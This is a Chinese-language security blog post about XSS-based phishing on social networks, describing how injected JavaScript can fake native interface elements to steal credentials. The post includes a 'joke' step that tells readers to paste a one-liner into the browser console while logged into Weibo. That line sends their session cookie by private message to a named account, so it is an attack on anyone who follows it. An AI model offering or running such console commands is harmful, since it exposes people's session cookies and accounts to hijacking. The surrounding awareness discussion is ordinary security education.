關(guān)于社交網(wǎng)絡(luò)里的高級釣魚攻擊
前段時間一直在寫工具黨、大數(shù)據(jù)黑客相關(guān)的科普文,今天開始換點口味好了,來看看前端攻擊里一些“驚悚”的攻擊方式。
今天只說高級釣魚
如果深刻知道這種釣魚攻擊的人,估計以后會談魚色變,這次我不科普太多文字,只簡單說下這種在大眾面前幾乎一片空白的攻擊方式,所以看完本篇文字,很多人還會繼續(xù)得瑟:“反正我不會中招”,深入的講解我一般都放在一些內(nèi)部的安全培訓(xùn)上了,如果有時間計劃整出一篇paper出來,一定很精彩。
大家想想,在社交網(wǎng)絡(luò)里(weibo也算,具有社交屬性的都算),我們對很多專屬于這個社交網(wǎng)絡(luò)的風格元素是不是習(xí)以為常了,比如漂亮的登錄頁面、設(shè)置頁面、修改密碼頁面、彈出層、聊天框、發(fā)消息界面等等,天天見,天天用,對這樣的風格習(xí)以為常了,哪天出現(xiàn)一個風格類似的新功能(比如提示“密碼異常,修改密碼”的彈出層),也不會懷疑,還以為是新增的友好功能……
這些對于JavaScript來說都是可以偽造的啊,而且可以超級YD的偽造,代碼量也不用多少,為什么呢?這得感謝那些偉大的前端工程師,他們封裝了很多超級方便的接口:)
只要一個XSS(跨站腳本攻擊),就可以引入任意JavaScript代碼,鬼魂一般,偽造了一個看起來真的假界面,釣到了想要的關(guān)鍵數(shù)據(jù),目的就達到了。其實在真實的高級攻擊里,如果能不釣就不釣,多了交互就多了攻擊復(fù)雜度,一段JavaScript也許通過一些Hacking技巧就能拿到如明文密碼、隱私資料等數(shù)據(jù),只要一招。
在社交網(wǎng)絡(luò)里,用戶體驗好作為第一要素,對于攻擊者來說,攻擊也會講究用戶體驗好,哪怕沒有XSS,也可以完成攻擊,想想,如何偽裝界面?只是利用XSS的攻擊更加原汁原味(我常說的原生態(tài)攻擊方式)。
原生態(tài)除了UI可以利用原生,還有相關(guān)的JS庫接口,比如針對weibo.com的一個小玩笑,大家可以用Chrome瀏覽器登錄自己的微博,然后按f12打開“開發(fā)者工具”,在Console中,復(fù)制上如下代碼,回車執(zhí)行:
STK.core.io.ajax({method:’POST’,url:’/aj/message/add’,args:{text:document.cookie.substr(0,300),screen_name:’%E4%BD%99%E5%BC%A6′}})
如此簡潔的代碼,攻擊者要是利用起來該有多方便:D
釣魚無非就是欺騙,在社交網(wǎng)絡(luò)里利用XSS進行的高級釣魚攻擊真的讓人防不勝防,這種攻擊我很早就提出,我感覺已經(jīng)在逐漸流行了,這就是為什么這兩年經(jīng)常有人提到的“美工黑客”,恩,黑客為了生存,開始更猥瑣了,開始接觸美工了,美工的目的就是視覺欺騙。
最后:多一分警惕,少一次泄密……